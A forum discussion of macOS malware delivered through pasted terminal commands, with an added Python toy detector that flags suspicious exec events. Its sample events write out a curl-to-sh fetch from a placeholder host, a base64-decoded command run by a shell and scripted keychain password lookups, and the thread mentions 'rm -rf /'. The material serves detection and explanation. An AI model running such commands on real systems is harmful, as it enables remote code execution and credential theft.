A text command pasted into the terminal isn't a binary.
Convincing a Linux user to paste rm -rf / into the terminal is not malware. It's social engineering.
Scanning binaries for known malware is already built into the OS.
Antivirus programs will run on PowerShell scripts, VBScript files, JScript files, and all other kinds of automation on Windows.
The screenshots from the article clearly show a permission prompt for a program. Whether that's a binary or a shell script or something else doesn't matter; the infection stage should've been caught by anti-malware rather than permission prompts.
Windows Defender does this already. If Apple's AV can't catch this, I think they may be relying on their DRM-as-a-security-measure (signatures, notarisation, etc.) a bit too much.
> Scanning binaries for known malware is already built into the OS.
Clearly it isn't. XProtect is a joke. It's 2004-era ClamAV level of protection.
The article specifically mentions that the methodology here is to trick users into running an obfuscated CLI command… that downloads and runs a binary.
Endpoint security software on the Mac, if it's worth the hit to system resources that is, inspects every call to exec and fork that occurs in the kernel and also inspects those for known attack vectors, malicious scripts, etc. The one I have installed on my work Mac will kill reverse shell attempts before they are run. It will stop keychain attacks and infostealing (as they can also get every file system op as it happens in the kernel).
Gatekeeper and XProtect are good, but there's only so much they can do.
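The last two replies describe the detection model: the endpoint agent sees every exec in the kernel and judges the command line, not just the file hash, which is how it catches "paste this obfuscated command that fetches and runs a binary" even when no binary is on a signature list. The block below is an added illustration of that idea, not code from the thread or from any vendor's product. It is a toy rule engine over constructed exec events (pids, parent names, paths and argv are all made up; `example.invalid` is a placeholder host) and flags the patterns the thread mentions: a fetcher piped into an interpreter, a base64-decoded command piped into a shell, scripted use of the `security` keychain tool, and a binary launched from a temp directory by a script. The event schema and rule names are assumptions for the example; a real Endpoint Security client would get richer fields and would tune the noisy keychain rule.

```python
"""Toy exec-event detector, added as an illustration of command-line-aware
endpoint monitoring.  Not the page's code or any vendor's product; event
layout, rule names and all sample events are constructed for this example."""
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass

SHELLS = {"sh", "bash", "zsh"}
INTERPRETERS = SHELLS | {"python", "python3", "perl", "osascript"}
FETCHERS = {"curl", "wget"}
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/")
KEYCHAIN_VERBS = {"find-generic-password", "find-internet-password", "dump-keychain"}


@dataclass
class ExecEvent:
    """Simplified exec notification (assumed shape, not the ES framework's)."""
    pid: int
    ppid: int
    parent: str        # basename of the parent executable
    path: str          # path of the executable being exec'd
    argv: list[str]


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def shell_command(ev: ExecEvent) -> str | None:
    """Return the command string when a shell is exec'd with -c, else None."""
    if basename(ev.path) in SHELLS and "-c" in ev.argv:
        i = ev.argv.index("-c")
        if i + 1 < len(ev.argv):
            return ev.argv[i + 1]
    return None


def pipeline_stages(cmd: str) -> list[str]:
    """First word (basename) of each '|'-separated stage of a shell command."""
    stages = []
    for seg in re.split(r"\|+", cmd):
        try:
            toks = shlex.split(seg)
        except ValueError:          # unbalanced quotes: fall back to whitespace split
            toks = seg.split()
        if toks:
            stages.append(basename(toks[0]))
    return stages


def classify(ev: ExecEvent) -> list[str]:
    """Apply the toy rules to one exec event; an empty list means 'nothing seen'."""
    findings: list[str] = []
    cmd = shell_command(ev)
    if cmd:
        stages = pipeline_stages(cmd)
        # Remote content fed straight into an interpreter: the "paste this" pattern.
        if any(s in FETCHERS for s in stages) and any(s in INTERPRETERS for s in stages):
            findings.append("remote-script-piped-to-interpreter")
        # Obfuscated command decoded on the fly and executed by a shell.
        if "base64" in stages and stages[-1] in INTERPRETERS:
            findings.append("obfuscated-command-decoded-and-run")
    exe = basename(ev.path)
    # Keychain tooling driven by a script rather than an interactive user.
    # Noisy in practice (build scripts use it too); shown here as the thread's example.
    if exe == "security" and ev.parent in INTERPRETERS and KEYCHAIN_VERBS & set(ev.argv):
        findings.append("scripted-keychain-access")
    # A script launching a freshly dropped binary from a temp location.
    if ev.path.startswith(TEMP_PREFIXES) and ev.parent in INTERPRETERS:
        findings.append("binary-run-from-temp-by-script")
    return findings


def scan(events: list[ExecEvent]) -> dict[int, list[str]]:
    """Map pid -> findings for every event that tripped at least one rule."""
    return {ev.pid: f for ev in events if (f := classify(ev))}


# Constructed sample events: one benign, four matching the thread's descriptions.
EVENTS = [
    ExecEvent(101, 50, "Terminal", "/bin/ls", ["ls", "-la"]),
    ExecEvent(102, 50, "Terminal", "/bin/sh",
              ["sh", "-c", "curl -fsSL https://example.invalid/update.sh | sh"]),
    ExecEvent(103, 50, "Terminal", "/bin/sh",
              ["sh", "-c", "echo QUFBQQ== | base64 -d | sh"]),
    ExecEvent(104, 103, "bash", "/usr/bin/security",
              ["security", "find-generic-password", "-s", "ExampleService"]),
    ExecEvent(105, 103, "sh", "/private/tmp/.cache/helper", ["helper"]),
]

if __name__ == "__main__":
    for pid, findings in scan(EVENTS).items():
        print(pid, ", ".join(findings))
```

The point of the example is the shape of the check, not the specific strings: the decision is made on the exec call with its full argv and parent process in view, so a command that was obfuscated in the user's clipboard is judged in its decoded, about-to-run form, which is exactly what a hash-based scan of downloaded files cannot do.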